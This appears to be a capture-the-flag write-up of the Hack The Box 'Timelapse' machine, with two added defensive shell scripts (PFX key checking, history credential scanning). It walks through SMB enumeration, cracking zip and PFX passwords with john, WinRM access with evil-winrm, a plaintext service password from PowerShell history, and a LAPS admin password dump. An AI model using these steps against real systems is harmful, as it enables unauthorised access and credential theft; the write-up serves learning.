Timelapse

I struggle with another medium box

assessment

Enumeration

nmap

Has to run with -Pn

```console
┌──(kali㉿kali)-[~/Documents/HTB/Timelapse]
└─$ nmap -Pn 10.10.11.152 -sV -oA initial_nmap --script vuln
Starting Nmap 7.92 ( https://nmap.org ) at 2022-04-03 13:08 EDT
Nmap scan report for 10.10.11.152
Host is up (0.23s latency).
Not shown: 989 filtered tcp ports (no-response)
PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2022-04-04 01:27:59Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: timelapse.htb0., Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped
|_ssl-ccs-injection: No reply from server (TIMEOUT)
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: timelapse.htb0., Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped
|_ssl-ccs-injection: No reply from server (TIMEOUT)
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: Could not negotiate a connection:SMB: Failed to receive bytes: ERROR
|_samba-vuln-cve-2012-1182: Could not negotiate a connection:SMB: Failed to receive bytes: ERROR
```

smb

As this is most likely a Windows server, I'm going to try to connect with smbclient and list the shares with a blank password.

```console
└─$ smbclient -L 10.10.11.152
Enter WORKGROUP\kali's password:

    Sharename       Type      Comment
    ---------       ----      -------
    ADMIN$          Disk      Remote Admin
    C$              Disk      Default share
    IPC$            IPC       Remote IPC
    NETLOGON        Disk      Logon server share
    Shares          Disk      
    SYSVOL          Disk      Logon server share
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.10.11.152 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available
```

Listing the Shares folder reveals a couple of subfolders containing a zip, some documents and a .msi installer. The zip is password protected. The other shares are password protected as well.

While I do some research I'll try to crack the zip file. It seems like it would be too easy, but I'll try anyway.

```console
┌──(kali㉿kali)-[~/Documents/HTB/Timelapse]
└─$ zip2john winrm_backup.zip > hash
ver 2.0 efh 5455 efh 7875 winrm_backup.zip/legacyy_dev_auth.pfx PKZIP Encr: TS_chk, cmplen=2405, decmplen=2555, crc=12EC5683 ts=72AA cs=72aa type=8
┌──(kali㉿kali)-[~/Documents/HTB/Timelapse]
└─$ john hash            
Using default input encoding: UTF-8
Loaded 1 password hash (PKZIP [32/64])
Will run 2 OpenMP threads
Proceeding with single, rules:Single
Press 'q' or Ctrl-C to abort, almost any other key for status
Almost done: Processing the remaining buffered candidate passwords, if any.
Proceeding with wordlist:/usr/share/john/password.lst
Proceeding with incremental:ASCII
```

The zip can be opened with supremelegacy. Inside there is a .pfx file. I'll try john on this one as well.

```console
└─$ john pfxhash --wordlist=~/Downloads/Wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (pfx, (.pfx, .p12) [PKCS#12 PBE (SHA1/SHA2) 256/256 AVX2 8x])
Cost 1 (iteration count) is 2000 for all loaded hashes
Cost 2 (mac-type [1:SHA1 224:SHA224 256:SHA256 384:SHA384 512:SHA512]) is 1 for all loaded hashes
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
thuglegacy       (legacyy_dev_auth.pfx)    
1g 0:00:01:50 DONE (2022-04-03 14:01) 0.009077g/s 29332p/s 29332c/s 29332C/s thuglife06..thug211
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
```

Again, john finds the password. Let's try to export the contents of the PFX file.

```console
┌──(kali㉿kali)-[~/Documents/HTB/Timelapse]
└─$ openssl pkcs12 -in legacyy_dev_auth.pfx -nocerts -out priv-key.pem -nodes

┌──(kali㉿kali)-[~/Documents/HTB/Timelapse]
└─$ openssl pkcs12 -in legacyy_dev_auth.pfx -nocerts -out certificate.pem    
```

We now have a couple of keys that hopefully will allow us access. I also tried opening the PFX file as text and was able to see a possible login, legacyy@timelapse.htb. Some more enumeration shows that port 5986 is open, which corresponds to WinRM over SSL. The hints on the HTB board also suggest that this might be a possible foothold.

I got a little nudge on the HTB Discord. Apparently I'm doing this the correct way, and WinRM is the way in. There are a bunch of WinRM tools, but the most popular seems to be Evil-WinRM, which I had apparently already tried with the correct command. The error that is returned points to something wrong with the certificate, so I'll retry exporting the private and public keys.

```console
┌──(kali㉿kali)-[~/Documents/HTB/Timelapse]
└─$ evil-winrm -i 10.10.11.152 -k p
Error: An error of type OpenSSL::X509::CertificateError happened, message is nested asn1 error
Error: Exiting with code 1
```

Foothold

I was indeed missing a step in exporting the keys from the .pfx file. The full sequence of commands is the following:

```console
┌──(kali㉿kali)-[~/Documents/HTB/Timelapse]
└─$ openssl pkcs12 -in legacyy_dev_auth.pfx -nocerts -out timelapse.pem -nodes
Enter Import Password:

┌──(kali㉿kali)-[~/Documents/HTB/Timelapse]
└─$ openssl pkcs12 -in legacyy_dev_auth.pfx -nokey -out cert.pem
pkcs12: Unrecognized flag nokey
pkcs12: Use -help for summary.

┌──(kali㉿kali)-[~/Documents/HTB/Timelapse]
└─$ openssl pkcs12 -in legacyy_dev_auth.pfx -nokeys -out cert.pem
Enter Import Password:

┌──(kali㉿kali)-[~/Documents/HTB/Timelapse]
└─$ openssl rsa -in timelapse.pem -out timelapse.key
writing RSA key
```

With the generated key files I can run evil-winrm again:

```console
┌──(kali㉿kali)-[~/Documents/HTB/Timelapse]
└─$ evil-winrm -i 10.10.11.152 -k timelapse.key -c cert.pem -S
```
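Added example, not from the original post: a small POSIX shell script that performs the same three openssl steps (key with -nocerts -nodes, certificate with -nokeys, then `openssl rsa` to rewrite the key without the PKCS#12 bag attributes) and afterwards checks that the extracted key and certificate actually belong together by comparing their RSA modulus. That check is the one to run before handing the files to any TLS client, since a mismatched or half-converted pair is what a client reports as a certificate or ASN.1 error. To run offline it builds its own throwaway self-signed PFX; the file names, the subject `sample-user` and the password `constructed-pw` are all made up for the example.

```shell
#!/bin/sh
# Added example (not the post's own commands): extract key + certificate from a
# PKCS#12 file and verify they form a matching pair.
# Assumptions: openssl on PATH; all file names and the password are constructed.

set -eu

WORK="${TMPDIR:-/tmp}/pfx-demo.$$"
mkdir -p "$WORK"
trap 'rm -rf "$WORK"' EXIT

# Build a throwaway self-signed certificate and wrap it in a PFX protected by a
# constructed password, so the example needs nothing from the box.
make_sample_pfx() {
    openssl req -x509 -newkey rsa:2048 -nodes -days 1 \
        -subj "/CN=sample-user" \
        -keyout "$WORK/sample.key" -out "$WORK/sample.crt" >/dev/null 2>&1
    openssl pkcs12 -export -in "$WORK/sample.crt" -inkey "$WORK/sample.key" \
        -out "$WORK/sample.pfx" -passout pass:constructed-pw
}

# extract_pfx PFX PASSWORD KEY_OUT CERT_OUT
# Same three steps as the post: unencrypted key, certificate only, then a clean
# key file without the "Bag Attributes" header that pkcs12 writes.
extract_pfx() {
    pfx=$1; pw=$2; key_out=$3; cert_out=$4
    openssl pkcs12 -in "$pfx" -nocerts -nodes -passin "pass:$pw" -out "$key_out.tmp"
    openssl pkcs12 -in "$pfx" -nokeys -passin "pass:$pw" -out "$cert_out"
    openssl rsa -in "$key_out.tmp" -out "$key_out" 2>/dev/null
    rm -f "$key_out.tmp"
}

# keypair_matches KEY CERT -> prints "match" or "mismatch"
# Hashes the RSA modulus of both files; equal moduli mean the key is the one
# the certificate was issued for.
keypair_matches() {
    k=$(openssl rsa -in "$1" -noout -modulus 2>/dev/null | openssl sha256)
    c=$(openssl x509 -in "$2" -noout -modulus | openssl sha256)
    if [ "$k" = "$c" ]; then echo match; else echo mismatch; fi
}

# cert_subject CERT -> prints the subject, i.e. whom the extracted pair identifies
cert_subject() {
    openssl x509 -in "$1" -noout -subject
}

# demo -> builds the sample PFX, extracts it and prints the pairing result
demo() {
    make_sample_pfx
    extract_pfx "$WORK/sample.pfx" constructed-pw "$WORK/out.key" "$WORK/out.crt"
    keypair_matches "$WORK/out.key" "$WORK/out.crt"
}

demo
```

Run it as-is to see `match`; point `extract_pfx` at a real PFX and a key file from somewhere else to see `mismatch`, which is the situation to rule out before blaming the client.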

User flag

After getting in, I can cd to the user's Desktop and type the user.txt file to get the flag.

Privilege escalation

The windows equivalent of .bash_history is %userprofile%\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt.

The following commands from the history appear to run whoami as the user **svc_deploy**:

```powershell
$so = New-PSSessionOption -SkipCACheck -SkipCNCheck -SkipRevocationCheck
$p = ConvertTo-SecureString 'E3R$Q62^12p7PLlC%KWaxuaV' -AsPlainText -Force
$c = New-Object System.Management.Automation.PSCredential ('svc_deploy', $p)
invoke-command -computername localhost -credential $c -port 5986 -usessl -SessionOption $so -scriptblock {whoami}
```
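The history file above is exactly the kind of artifact a defender should be checking for. Added example, not from the original post: a POSIX shell triage script that scans a collected ConsoleHost_history.txt for lines that embed credentials (ConvertTo-SecureString with -AsPlainText, PSCredential construction, a quoted -Password argument) and reports them with the quoted literals masked, so the report itself does not re-expose the secret. The history contents, the user name `svc_example` and the passwords in it are constructed for the example, and the pattern list is an assumption to be tuned per environment.

```shell
#!/bin/sh
# Added example (not from the original post): flag credential material typed
# into PowerShell and recorded by PSReadline.
# Assumptions: POSIX sh with grep/sed; the sample history below is constructed.

set -eu

# Patterns that usually mean a secret was typed on the command line:
#  - ConvertTo-SecureString ... -AsPlainText   (literal password in the session)
#  - PSCredential                                (credential object built by hand)
#  - -Password '...' / -Password "..."           (quoted password argument)
CRED_REGEX="ConvertTo-SecureString.*-AsPlainText|PSCredential|-Password[[:space:]]+['\"]"

# write_sample_history FILE -> writes a constructed history file for the demo
write_sample_history() {
    cat > "$1" <<'EOF'
whoami
ipconfig /all
$so = New-PSSessionOption -SkipCACheck -SkipCNCheck -SkipRevocationCheck
$p = ConvertTo-SecureString 'Constructed-Example-Pw1' -AsPlainText -Force
$c = New-Object System.Management.Automation.PSCredential ('svc_example', $p)
invoke-command -computername localhost -credential $c -port 5986 -usessl -SessionOption $so -scriptblock {whoami}
Invoke-Sqlcmd -ServerInstance db01 -Username sa -Password 'Constructed-Pw2' -Query 'select 1'
Get-ChildItem C:\Users
EOF
}

# scan_history FILE -> "lineno:line" for every suspicious line
# "|| true" keeps an empty result from aborting the script under set -e.
scan_history() {
    grep -n -i -E "$CRED_REGEX" "$1" || true
}

# count_findings FILE -> number of suspicious lines
count_findings() {
    scan_history "$1" | wc -l | tr -d ' '
}

# redact_findings FILE -> the findings with every quoted literal masked.
# Quoted user names get masked too; the line number is enough to locate them.
redact_findings() {
    scan_history "$1" | sed -E "s/'[^']*'/'<redacted>'/g; s/\"[^\"]*\"/\"<redacted>\"/g"
}

HIST="${TMPDIR:-/tmp}/ConsoleHost_history.sample.$$.txt"
write_sample_history "$HIST"
echo "suspicious lines: $(count_findings "$HIST")"
redact_findings "$HIST"
rm -f "$HIST"
```

On a real host the file to feed in is the one the post names, `%userprofile%\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt`, collected for each profile; any hit is a reason to rotate that credential, not just to delete the line.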

After running a few commands for testing, I'll try to change svc_deploy to administrator.

```console
*Evil-WinRM* PS C:\Users> invoke-command -computername localhost -credential $c -port 5986 -usessl -SessionOption $so -scriptblock {whoami}
Connecting to remote server localhost failed with the following error message : Access is denied. For more information, see the about_Remote_Troubleshooting Help topic.

    + CategoryInfo          : OpenError: (localhost:String) [], PSRemotingTransportException
    + FullyQualifiedErrorId : AccessDenied,PSSessionStateBroken
```

That would have been too easy, but I had to try. I believe the SecureString parameter might be present somewhere else. Reading through the docs, there might be a way to use PowerShell to reset the admin password.

After running winPEAS.bat, one of the items checked was a LAPS password. The documents I got earlier during enumeration pointed to this feature as having a clear-text password for the Administrator account.

After a little nudge on the Discord it became clear that the way in is with the svc_deploy user account. So, let's try to get in using evil-winrm again, this time with the credentials exposed in the PowerShell history.

```console
┌──(kali㉿kali)-[~/Documents/HTB/Timelapse]
└─$ evil-winrm -i 10.10.11.152 -u svc_deploy -S -s ./
Enter Password:
```

After opening a WinRM session I tried looking through folders, but with no luck. This account has no privileges to look inside other users' folders. But the username sounds like something that the app I downloaded would use to access the LAPS subsystem. Let's see if I can get that password with a few PowerShell commands.

```console
*Evil-WinRM* PS C:\Users> $laps = Get-ADComputer -Filter * -Properties ms-Mcs-AdmPwd,ms-Mcs-AdmPwdExpirationTime -Server DC01 | ? {$_.'ms-Mcs-AdmPwd'} | select Name,ms-Mcs-AdmPwd,@{label="ExpDate";Expression={([datetime]::FromFileTime([convert]::ToInt64($_.'ms-Mcs-AdmPwdExpirationTime')))}}
*Evil-WinRM* PS C:\Users>
*Evil-WinRM* PS C:\Users> $laps

Name ms-Mcs-AdmPwd            ExpDate
---- -------------            -------
DC01 <redacted> 4/14/2022 12:51:12 PM
```

And there is the Administrator password. I can now log on as Administrator and look for the folder with the root flag. It's inside another user's desktop.

Overall an easier box than what I'm used to, made difficult because it was the first Windows box I tried on HTB.
